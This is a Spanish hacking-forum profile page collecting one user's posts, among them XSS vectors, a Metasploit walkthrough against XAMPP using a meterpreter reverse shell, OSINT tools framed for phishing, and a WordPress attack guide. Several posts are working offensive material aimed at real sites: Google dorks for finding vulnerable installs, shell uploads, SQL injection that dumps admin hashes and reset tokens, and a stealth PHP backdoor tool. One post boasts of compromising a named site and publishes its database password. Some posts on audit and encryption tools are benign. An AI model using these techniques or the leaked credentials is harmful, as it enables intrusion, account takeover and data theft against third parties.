Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - CalebBucker

#1
Hacking ShowOff / XSS Found in FBI.GOV
Diciembre 28, 2012, 02:55:20 PM


Fue reportado en el mismo momento que encontré dicho bug, no me respondieron, a los 3 días verifique si el bug seguía vigente y para sorpresa estaba parcheado.

El vector fue esta:
Código: text
<body onLoad="while(true) alert('XSS');">


Saludos.
#2

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.

La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

- BackTrack 5 R1 - R2 o R3 (Atacante)
- Metasploit Framework (Atacante)
- Windows XP - 7 - 8 (Victima)
- XAMPP (Victima)

PROCEDIMIENTOS:

Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
Código: text
nmap -sS -T4 -A 192.168.1.38



Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:
Código: text
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit


Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.


Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.


Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.

Espero les sirva y practiquen ;)
#3


INTRODUCCIÓN:

La primera fase de evaluación de la seguridad es centrarse en la recopilación de información tanto como sea posible acerca de una aplicación web. De acuerdo con OWASP, la recopilación de información es un paso necesario en lo que respecta las pruebas de penetración.

Hay básicamente dos tipos de recolección de información: activa y pasiva. Recopilación de información pasiva es que los atacantes no se comunicarán con el objetivo directamente y estarán tratando de reunir información que está disponible en la Internet, mientras que en la recolección activa de información, el atacante estará en contacto directo con el objetivo y estará tratando de reunir información.

La recopilación de información se realiza generalmente en la infraestructura y en las personas. En infraestructura de reconocimiento, los atacantes generalmente tratan de encontrar la información acerca del host, es decir, el registro de intercambio de correo, nombres de registro y servidores, recursos compartidos, etc. Para la recopilación de información sobre las personas, los atacantes tratan de reunir información como direcciones de correo electrónico, sus perfiles públicos, archivos subidos públicamente, etc, que pueden ser utilizados para la ingeniería social o Spear phishing.

Para tal caso, usaremos la herramienta Maltego, que por cierto es una de las mejores herramientas de Informatcion Gathering la cual se encuentra disponible en la suite de BackTrack.

¿QUE ES MALTEGO?

Maltego, es una herramienta de codigo abierto que se basa en la información y aplicación forense y muestra cómo la información está conectado el uno al otro. Otra ventaja de esta herramienta es que la relación entre los distintos tipos de información pueden dar una mejor idea de cómo están relacionados entre sí y también puede ayudar en la identificación de relación desconocida.

¿QUE INFORMACIÓN SE PUEDE ENCONTRAR UTILIZANDO MALTEGO?

Con Maltego, podemos encontrar la relaciones que las personas mayormente usan en la actualidad, incluyendo su perfil social, amigos mutuos, las empresas que se relacionan con la información recopilada, y sitios web.

Si queremos recoger información relacionada con cualquier infraestructura, podemos reunir relación entre los dominios y nombres de DNS.

ARQUITECTURA DE MALTEGO:


UBICACIÓN:

- Aplicaciones - Backtrack - Information Gathering - Network Analysis - DNS Analysis - Maltego

La primera vez que ingrese se ​​le pedirá que registre su producto. Si ya tienes una cuenta, introduce tu correo electrónico y contraseña.

Seguidamente, se abrirá la interfaz de la herramienta, mostrando sus opciones, como se aprecia en la imagen siguiente:


INFRASTUCTURE OPCIONES:

- AS
- DNS Name
- Domain
- IPv4 Address
- MX Record
- NS Record
- Netblock
- URL
- Website


PERSONAL OPCIONES:

- Alias
- Document
- Email Address
- Image
- Person
- Phone Number
- Phrase

Vamos a ver algunas de las opciones, para ello usare la opcion Domain de la pestaña Infrastucture:


Al ejecutar esta opción  podemos elegir muchas opciones para obtener información sobre un dominio especificado, como son DNS, dominios e IP.


Reconocimiento Personal:

Maltego ayuda a encontrar información sobre una persona, como su dirección de correo electrónico, perfiles sociales, amigos comunes, diversos archivos compartidos en varias direcciones URL, etc. Aquí seleccionar la opcion "Person" y escriba el nombre de la persona que va a estar tratando de reunir información.

Ejemplo: colocare "barack obama"



Como se aprecia, he obtenido información en la cual incluye, numero de teléfonos  Facebook, E-mails y direcciones de pagina web correspondiente al nombre que he colocado.

Este método generalmente busca una afiliación de Facebook que coincida estrechamente a nombre de una persona basándose en el nombre y apellido. Con Maltego también podemos encontrar amigos en común de dos personas específicas con el fin de reunir más información.

Del mismo modo, podemos encontrar si el usuario ha enviado archivos en pastebin o cualquier URL pública. Con toda esta información puede ser útil para realizar una ingeniería social basada en ataque.

Mas Información: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Facebook: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Youtube: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos.
#4
Hacking ShowOff / XSS Found in Alexa Rank
Octubre 06, 2012, 12:34:41 AM
Target: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vector: Doble Codificacion + String.fromCharCode

Captura:

Reported!
#5
Hacking ShowOff / Remoteexecution.info Pwned!
Octubre 03, 2012, 12:10:38 AM
Que opinan sobre esto?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Les gusta hablar mal de las personas? se creen dios? mucho hablan y no hacen nada...

Formo parte del staff de underc0de, por lo tanto cuando hablan de underc0de estan metiendo a todo el staff (incluido yo)

Pues, ahora veamos algo mas divertido  8)

Target: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: text
########## Database Info ##########
$db_server = 'localhost';
$db_name = 'remoteex_foro';
$db_user = 'remoteex_user';
$db_passwd = '(~R9bLM0rT6X';






Pwned?

DOWNLOAD DATABASE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Enjoy!
#6

Jigsaw es una herramienta basada en Ruby que nos permite enumerar la informacion (E-mail, Direccion, Nombre y Apellidos y Cargos) de las personas que laboran en una empresa ya sea en Facebook, Google, Microsoft u otros.

Mayormente esta informacion puede servir para realizar Ing. Social o E-mail Pishing.


UBICACIÓN:

- Aplicaciones - BackTrack - Information Gathering - Network Analysis - OSINT Analysis - jigsaw



MODOS DE USO:

- En este caso obtendré información de Facebook, para ello usare el comando: ./jigsaw.rb -s Facebook



- He obtenido algunos ID mostrando el nombre de la entidad a la que corresponde, entonces colocare el comando incluyendo el numero de ID de la entidad que queremos obtener información, ejemplo: ./jigsaw.rb -i 234590



- Como vemos, el ID que he colocado ha arrojado 2 dominios, por lo tanto nos muestra un mensaje indicando que coloquemos el dominio de la cual queremos obtener información, en este caso colocare No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


- La información que se obtuvo fue de 479 records en la cual incluye Nombres y Apellidos, Cargos, E-mail y Dirección Domiciliaria.

Ahora, si queremos guardar la información obtenida y luego visualizarla nuevamente, simplemente colocaremos los siguientes comandos:
Código: text
./jigsaw.rb -i 234590 -r facebook
facebook.com
ls
cat facebook.csv




VIDEO-TUTORIAL:


DESCARGAR JIGSAW:

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#7
Pentesting / Enumeración de Email e Informacion con JIGSAW
Septiembre 25, 2012, 01:45:24 PM

Jigsaw es una herramienta basada en Ruby que nos permite enumerar la informacion (E-mail, Direccion, Nombre y Apellidos y Cargos) de las personas que laboran en una empresa ya sea en Facebook, Google, Microsoft u otros.

Mayormente esta informacion puede servir para realizar Ing. Social o E-mail Pishing.


UBICACIÓN:

- Aplicaciones - BackTrack - Information Gathering - Network Analysis - OSINT Analysis - jigsaw



MODOS DE USO:

- En este caso obtendré información de Facebook, para ello usare el comando: ./jigsaw.rb -s Facebook



- He obtenido algunos ID mostrando el nombre de la entidad a la que corresponde, entonces colocare el comando incluyendo el numero de ID de la entidad que queremos obtener información, ejemplo: ./jigsaw.rb -i 234590



- Como vemos, el ID que he colocado ha arrojado 2 dominios, por lo tanto nos muestra un mensaje indicando que coloquemos el dominio de la cual queremos obtener información, en este caso colocare No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


- La información que se obtuvo fue de 479 records en la cual incluye Nombres y Apellidos, Cargos, E-mail y Dirección Domiciliaria.

Ahora, si queremos guardar la información obtenida y luego visualizarla nuevamente, simplemente colocaremos los siguientes comandos:
Código: text
./jigsaw.rb -i 234590 -r facebook
facebook.com
ls
cat facebook.csv



DESCARGAR JIGSAW:

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#8

Un investigador de seguridad ha encontrado una nueva Vulnerabilidad 0day que afecta a Internet Explorer, mientras que el análisis de una página de malware que se estaba utilizando para explotar las vulnerabilidades de Java. Según el equipo de Metasploit, el Internet Explorer 7, 8 y 9 en Windows XP, Vista y 7 son vulnerables a este ataque.

Eric Romang ha descubierto una carpeta "/public/help" en uno de los servidores infectados. Él encontró un archivo flash (.Swf), dos paginas html (protect.html, exploit.html) y el archivo exe.


Al abrir la página exploit.html, carga el archivo flash, que a su vez carga la otra página HTML (protect.html). Juntos, ayudan a bajar el archivo ejecutable en la computadora de la víctima.

El equipo de Metasploit inmediatamente ha desarrollado el módulo para este exploit. Según los investigadores de Metasploit, el exploit, que ya había sido utilizado por los atacantes maliciosos en la naturaleza antes de que fuera publicado en Metasploit, afecta a alrededor del 41% de los usuarios de Internet en América del Norte y el 32% a nivel mundial.

Desde que Microsoft no ha lanzado un parche para esta vulnerabilidad, sin embargo, se aconseja a  los usuarios de IE cambiar a otro navegador hasta que una actualización de seguridad disponible.

exploit.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

"exploit.html" es el punto de partida del ataque. Este archivo se crea una matriz de "img" y carga  el archivo Flash "Moh2010.swf"



Moh2010.swf
Este archivo es reconocida como una película de Macromedia Flash Player, y por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Se puede observar que el archivo está lleno de DosSWF que se descomprimira en la memoria. Después de la descompresión "Moh2010.swf" el archivo se derrama en el montón y eval un iframe al archivo "Protect.html".


El código ActionScript incrustado en el original lleno de archivos SWF, también es interesante, podrás ver algunos de codificación especial (chino?).

Este archivo, que durante la explotación es también comprobar si el sitio web está en Flash Website Storage Settings pannel para nada más cargar el archivo "Protect.html". Esto significa, que una vez infectado el usuario ya no será explotado a pesar de nuevas visitas a la página web.

Muestra en la primera visita:


Muestra de la explotación exitosa:


Muestra en otras visitas:


Protect.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si usted echa un vistazo al código fuente, se puede ver el código javascript interesante, como es la manipulación de la "img" matriz creada por "exploit.html".


También verá que las pruebas se hacen, con destino a Windows XP 32-bit e Internet Explorer 7 u 8.



111.exe
Este archivo se reconoce como un archivo de imagen Autodesk FLIC, y por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El archivo se ha enviado a Malware Tracker (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), este archivo se ve sospechoso y requiere mas investigaciones.

Si deseamos tener el modulo para explotar esta vulnerabilidad desde el Metasploit, es necesario actualizar la misma desde el siguiente link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La captura de pantalla siguiente se muestra un ataque exitoso contra una máquina de Windows 7 con Internet Explorer 9 instalado:


Está es en contra de Internet Explorer 8 instalado:


He aquí otro ejemplo de la explotación en un Windows XP SP3 box, totalmente parcheado:


El exploit también trabaja en contra de Windows Vista.

Fuentes de Información:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Spanish)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#9


DESCRIPCIÓN:

Dmitry (Deepmagic Information Gathering Tool) es una herramienta para UNIX/GNU exclusivamente programada en C la cual tiene la capacidad de reunir mucha informacion acerca de un Host.

Dmitry tiene una funcionalidad con la posibilidad de añadir nuevas funciones. La funcionalidad básica de Dmitry permite que la información sea recopilada sobre un host desde una simple búsqueda whois y escaneos de puertos TCP.

La aplicación se considera una herramienta para ayudar en la recopilación de información cuando la información es requerida rápidamente mediante la eliminación de la necesidad de introducir múltiples comandos.

UBICACIÓN:

Aplicaciones - BackTrack - Information Gathering - Network Analysis - Route Analysis - dmitry


OPCIONES:

-i Realiza una búsqueda whois sobre el objetivo. Por ejemplo: ./dmitry -i 255.255.255.255


-w Realiza una búsqueda whois en el 'host'. Esto requiere que el objetivo sea en un formato de carácter nombrado. Por ejemplo: ./dmitry -w No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-n Recupera datos desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sobre el host, lo que incluye el sistema operativo, versión del servidor Web y la información UpTime cuando estén disponibles. Por ejemplo: ./dmitry -n No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-s Realiza una búsqueda de un subdominio en el destino especificado. Esto utiliza los motores de búsqueda para intentar localizar a los sub-dominios en forma de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Por ejemplo: ./dmitry -s No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-e Realize una búsqueda de Email en el destino especificado. Este módulo funciona con el mismo concepto que la búsqueda SubDomain tratando de localizar posibles direcciones de correo electrónico de un servidor. Por ejemplo: ./dmitry -e No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-p Realiza un escaneo de puertos TCP en el host. Este módulo mostrará una lista de los puertos abiertos, cerrados y se filtra dentro de un rango específico. Por ejemplo: ./dmitry -p No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-f  Esta opción hará que el módulo TCP PortScan comunicar/mostrar la salida de los puertos filtrados. Estos son por lo general los puertos que se han filtrado y/o cerrado por un servidor de seguridad. Esta opcion requiere la opcion -p. Por ejemplo: ./dmitry -pf No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-b Esta opción hará que el módulo TCP PortScan muestre el nombre del servicio que esta corriendo al escanear puertos TCP. Esta opción requiere la opción -p Por ejemplo: ./dmitry -pb 174.120.240.9


-t Esto establece el tiempo de vida (TTL) del módulo de escaneo de puertos para escanear puertos individuales. Esto se ajusta a 2 segundos de forma predeterminada. Esto suele ser necesario cuando se escanea un host que tiene un firewall y/o se ha filtrado los puertos.


El código fuente se incluye con este software para que los usuarios y desarrolladores puedan entender el software para fines de auditoría de seguridad.

Saludos.
#10

Algunos atacantes pueden determinar que un sitio web se ejecuta en Joomla! con tan solo escribir No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero en algunos casos, cuando tecleamos /administrator/ automaticamente nos redirecciona al index.php, entonces practicamente el atacante se da por vencido, ya que piensa que el sitio web es Joomla pero el panel admin tiene otro nombre o otra direccion.

Eso sucede por la configuracion que el administrador ha realizado a su sitio Joomla, instalado el Plugin AdminExile que permite a los administradores añadir una clave de acceso al final de la URL que redirige las entradas erróneas a la página de inicio, página 404, o en cualquier otro lugar sin ver el panel de inicio de sesión de administrador.

Ejemplo:

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta           <----- Redirecciona al index.php

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    <----- Admin Panel

Una vez que haya hecho clic en el segundo enlace, su clave AdminExile estará activo hasta que caduque la sesión (o hasta que se cierra el navegador).


Para este caso, he realizado un video demostrativo, donde facilmente logro obtener el key (clave) para ingresar al sitio administrativo sin problemas.

Video:
Descripcion: Obteniendo la configuracion de la db (web) mediante Symlink, obteniendo usuario y clave administrativa, "bypass" AdminPanel y colocando el 0day Java7


Plugin AdminExile: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#11
Hacking ShowOff / XSS Found in Google Play
Septiembre 05, 2012, 02:33:44 PM


STATUS: Reported
#12

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13

Encryption Wizard (Ewizard) es un simple y fuerte encriptador de archivos y carpetas programada en Java que sirve para proteger la información confidencial (FOUO, Privacy Act, CUI, etc.).

Ewizard encripta todos los tipos de archivos sin privilegios de instalación o elevada ya que se puede ejecutar en Windows, Mac, Linux, Solaris y otros equipos que cuenten con Sun Java.

Detrás de su simple drag-n-drop interfaz, Ewizard ofrece 128-bit AES de cifrado, SHA-256 hashing, búsqueda de meta-datos, archivos, comprensión, eliminación segura y soporte PKI/CAC/PIV.

Ewizard fue inventado y es propiedad del Gobierno de los Estados Unidos de Norteamérica.

La versión publica de esta herramienta puede ser usado por cualquier persona, la versión EW-Public esta diseñada para las computadores del Gobierno Federal de EE.UU y la version EW-Govt esta acreditado por el Ejercito y la Fuerza Aerea para NIPRNet y SIPRNet.

Esta herramienta, por supuesto, esta disponible en nuestra distro favorita (BackTrack 5r3)

UBICACIÓN:

Aplicaciones - BackTrack - Miscellaneous - Miscellaneous Client - Ewizard

Si aun no tenes esta herramienta en tu distro o S.O podes descargarla desde el siguiente link:

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

USO:

- Para cifrar un archivo, debe especificarse una frase de contraseña y el archivo protegido puede accederse sólo por aquellos que conocen la contraseña correcta.

ENCRIPTANDO ARCHIVOS:

- Abirmos la herramienta desde la consola: java -jar EW-Public-3.3.4.jar


- Para poner a prueba esta herramienta, creamos un archivo, en este caso creare un archivo simple en texto con el nombre "test" y la agregamos a la herramienta (File - Add file/directory)


- Cuando el archivo se ha cargado correctamente en Ewizard, el siguiente paso es hacer click en el botón Encrypt.


- PASSPHRASE: En este paso tenemos que introducir la contraseña, escribimos la contraseña y le damos ADD para seguir con el siguiente paso.


- GENERAR PASSPHRASE: Ewizard  también tiene una función para generar una contraseña segura, para utilizar esta funcion hacemos click en Generate Password. Generada la contraseña la copiamos para luego colocarlo en PASSPHRASE, terminado le damos en Next.


- Keep Files: Hacemos click en Keep files para que la herramienta empieze a encriptar el archivo, por lo que obtendremos un encriptado con exito.


- Nuestro archivo se encripto perfectamente, ahora estamos seguro que sera muy dificil que alguien logre desencriptar el archivo en este tipo de formato.


DESENCRIPTANDO ARCHIVOS:

- Decrypt Files: Para descifrar el archivo, tenemos que seleccionar el archivo y hacer click en el botón Decrypt, de igual forma si tenemos un archivo en este formato lo agregamos a la herramienta desde File - Add File/directory


- Passphrase: Introducimos la contraseña, que colocamos cuando encriptamos el archivo.


- Keep File: Seleccionamos Keep file para desencriptar el archivo, en este caso saldra un aviso sobre si deseo reemplazar el archivo desencriptado por el anterior que cree en el primer paso (test)


- Archivo Desencriptado: Este es el archivo desencriptado (test):


Así es como se puede utilizar esta herramienta para encriptar y desencriptar archivos y carpetas en este tipo de formato.

SITIO OFICIAL DEL PROYECTO: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#14

Al igual que muchas otras herramientas, Lynis fue incluido recientemente en el nuevo BackTrack 5 r3 como una herramienta de Auditoria y Seguridad para muchas distribuciones de Linux.

INTRODUCCIÓN:

Lynis es una herramienta de auditoría que analiza y recopila la información de los sistemas basados ​​en Unix. La audiencia de esta herramienta son la seguridad y el sistema de auditores, especialistas en redes y técnicos de mantenimiento del sistema.

Analiza el software del sistema para detectar problemas de seguridad, también buscará información general del sistema, los paquetes instalados y los errores de configuración.

Este programa tiene como objetivo ayudar en la auditoria automatizada, parches de software de gestión de vulnerabilidades y análisis de malware de los sistemas basados ​​en Unix. Se puede ejecutar sin instalación previa.

DIRIGIDO PARA:

- Especialistas en Seguridad.
- Pentesters
- Auditores de Sistema.
- Administradores de Sistema y Redes.

DISTRIBUCIONES ADMITIDAS:

- Debian
- CentOS
- Gentoo
- Fedora Core 4 and higher
- FreeBSD
- Arch Linux
- Knoppix
- OpenSuSE
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- Mac OS X
- PcBSD
- Ubuntu
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10

INSTALACIÓN:

- apt-get install lynis

LYNIS AUDITA LOS SIGUIENTES SERVICIOS:

- System Tools
- Boot and services
- Kernel
- Memory and processes
- Users, Groups and Authentication
- Shells
- File systems
- Storage
- NFS
- Software: name services
- Ports and packages
- Networking
- Printers and Spools
- Software: e-mail and messaging
- Software: firewalls
- Software: webserver
- SSH Support
- SNMP Support
- Databases
- LDAP Services
- Software: PHP
- Squid Support
- Logging and files
- Insecure services
- Banners and identification
- Scheduled tasks
- Accounting
- Time and Synchronization
- Cryptography
- Virtualization
- Security frameworks
- Software: file integrity
- Software: Malware scanners
- System Tools
- Home directories
- Kernel Hardening
- Hardening

ABRIENDO LA HERRAMIENTA:

- Aplicaciones - BackTrack - Vulnerability Assessment - Vulnerability Scanners - Lynis


EJEMPLOS REALES:

Para auditar nuestro sistema, simplemente colocamos el comando ./lynis --auditor "tunombre" y presionamos ENTER por lo que la herramienta empezara a trabajar.

- Lynis: OS Detection:


- System Tools y Boot and Services:


- Kernel y Memory and processes:


- Networking y Printers and Spools:


- Software: webserver:


LYNIS REPORT:

- cd /var/log/
- cat lynis-report.dat


- vim lynis-report.dat


Este es el mejor Programa de Auditoría Linux.

Lynis da una cantidad y profundidad de la información acerca de su sugerencia de Linux, lo que ayudará a mejorar la seguridad de nuestro Linux.

SITIO OFICIAL DEL PROYECTO: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#15

WordPress  ¿Qué es?

WordPress es un sistema de gestión de contenido (en inglés Content Management System, o CMS) enfocado a la creación de blogs (sitios web periódicamente actualizados). Desarrollado en PHP y MySQL, bajo licencia GPL y código modificable. WordPress se ha convertido junto a Movable Type en el CMS más popular de la blogosfera y en el más popular con respecto a cualquier otro CMS de aplicación general. Las causas de su enorme crecimiento son, entre otras, su licencia, su facilidad de uso y sus características como gestor de contenidos.

WordPress ¿Objetivo de Hackers?

Según Wikipedia: WordPress es usado por más del 16,7% en el rank Alexa Internet "top 1 million" de sitios web y en agosto de 2011 gestiona el 22% de todos los nuevos sitios web.

Esto y debido a los miles de plugins y temas disponibles para WordPress, no hace falta decir que los programadores han codificado descuidadamente una parte equitativa de estos y que las posibilidades de una mayor escalada de privilegio para el hacker si encuentra un sitio web utilizando un plugin explotable o no actualizados . Estos pueden ir desde las vulnerabilidades de tipo SQLi a LFI de la que voy a explicar más abajo. Pero en términos más simples un plugin web explotable eventualmente puede conducir a la administración y el acceso total al servidor.

¿Cómo encontramos sitios web que utilicen WordPress?

Usando dorks simples que pueden ser eficaces, por ejemplo:
Código: txt
intext:"Proudly powered by WordPress. "
intext:"Powered by WordPress. "


Además, podemos utilizar la ruta de configuración estándar de WordPress, utilizando la siguiente dork:
Código: txt
inurl: /wordpress/wp-content/plugins/


Esto encuentra un montón de sitios web de WordPress con los listados de directorios habilitados. Podemos navegar por el directorio y tomar nota de los plugins que utiliza el servidor. Esto es parte del proceso de enumeración, una vez que hemos tomado nota de lo plugins nos dirigimos a exploit-db en busca de exploits para dichos plugins.

Código: txt
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_author=&filter_platform=0&filter_type=0&filter_port=&filter_osvdb=&filter_cve=


¿Cómo explotamos sitios WordPress? Ejemplos reales:

1) Arbitrary File Upload: Easy Comment Uploads - Version - 3.2.1, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php


Apreciaremos el sitio web de la siguiente forma:


Después de eso, es muy sencillo subir y localizar nuestra shell, solo queda disfrutar de ella.


2) Stored XSS: Version 3.2.3, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/count-per-day/notes.php


Apreciaremos el sitio web de la siguiente forma:


Podemos inyectar cualquier codigo javascript (XSS) la cual automaticamente se almacenara en el stored. El archivo "notes.php" no se limita solo a los administradores, por lo tanto cualquier persona puede acceder al archivo.


3) Arbitrary File Upload: Custom Content Type Manager, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/custom-content-type-manager/upload_form.php


Apreciaremos el sitio web de la siguiente forma:


Desde ahí se puede subir una shell, pero tenemos que cargarlo como una extensión de imagen (JPG/PNG/GIF). Para acceder a la shell, la encontraremos la siguiente manera:

Código: txt
http://www.sitio-web.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg



4) SQL Injection: Wordpress HD Webplayer - Version 1.1, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=


Apreciaremos el sitio web de la siguiente forma:


Desde ahí se puede hacer una inyección básica, en primer lugar nos encontramos con las columnas, digamos que tiene 11, entonces inyectamos de la siguiente manera:

Código: txt
videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7,8,9,10,11+from​​+wp_users


Luego, por supuesto, una vez que se ha inyectado vamos a obtener los datos del administrador:


5) [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

Esta vulnerabilidad se puede utilizar cuando tenemos un sitio web WordPress vulnerable a SQL Injection, la cual podemos obtener los datos administrativos como son el USUARIO, E-MAIL y PASSWORD, pero como ya sabemos y apreciamos en la imagen anterior, todo PASSWORD de WordPress estan encryptadas de una manera que es muy dificil de desencryptar, para ello usaremos esto metodo que consiste en Resetear el Password con el usuario o e-mail administrativo, la cual obtendremos un Token con lo que facilmente podemos cambiar la contraseña administrativa.

Obtendremos el user_login y user_email de la siguiente manera:
Código: txt
/*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users

Obtenido el usuario o e-mail nos dirigimos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y seleccionamos en ¿Olvidó su contraseña? introducimos el usuario o e-mail


Presionaremos en "Get New Password" la cual el sitio web enviara una codigo de activacion (Token)   entonces como es logico, dicho Token se almacena en la DB, por lo tanto obtendremos dicho codigo de la siguiente manera:
Código: txt
/*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,1​0,11 from wp_users


Obtenido dicho Token, solo nos faltaria restablecer la contraseña, para ello nos dirigimos al siguiente link:
Código: txt
http://www.sitio-web.com/wp-login.php?action=rp&key=Token&login=Usuario


Remplazamos "Token" y "Usuario" por lo datos que nos arroja la DB, por ejemplo:
Código: txt
http://www.sitio-web.com/wp-login.php?action=rp&key=RXr7T7lplszV&login=admin


Por lo que obtendremos la opcion de restablecer la contraseña facilmente, como vemos en la siguiente imagen:


6) Full Path Disclosure (FPD), usaremos la siguiente dork:
Código: txt
inurl:"/wp-includes/

Apreciaremos el sitio web de la siguiente forma:


Dando click en cualquiera de los archivos, facilmente el sitio web nos mostrara el Path (ubicacion) de sus archivos.

Ejemplo:
Código: txt
http://www.vulnerability-lab.com/dev/wp-includes/admin-bar.php


Mayormente esta Vulnerabilidad lo tienen el 80% de todos los sitios WordPress, pues facilmente podemos ir a cualquier sitio (WordPress) y diriginos a /wp-includes/ para apreciar dicha vulnerabilidad.

7) Fingerprinting WordPress version:

Este metodo sirve para obtener las versiones correcta de un sitio WordPress, para ello existen muchas herramientas como son:

Esas herramientas aparte de obtener la versión de WordPress de la página web, tambien puede  obtener información sobre las versiones de los plugins instalados y compara su versión a la última y más a la versión de los datos disponibles en la actualidad que indica si puede ser vulnerable o no.

Es todo por ahora.

Saludos.
#16

WeBaCoo (Web Backdoor Cookie)  es un backdoor web script-kit que proporciona una terminal de  conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).

WeBaCoo fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido. El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.

WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos. También ofrece la "terminal" el modo en que el usuario puede establecer una remota  conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.

En muchos casos, esta herramienta es muy usada cuando un servidor no tiene instalado el Netcat.

INSTALACIÓN:

COMANDOS:

1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
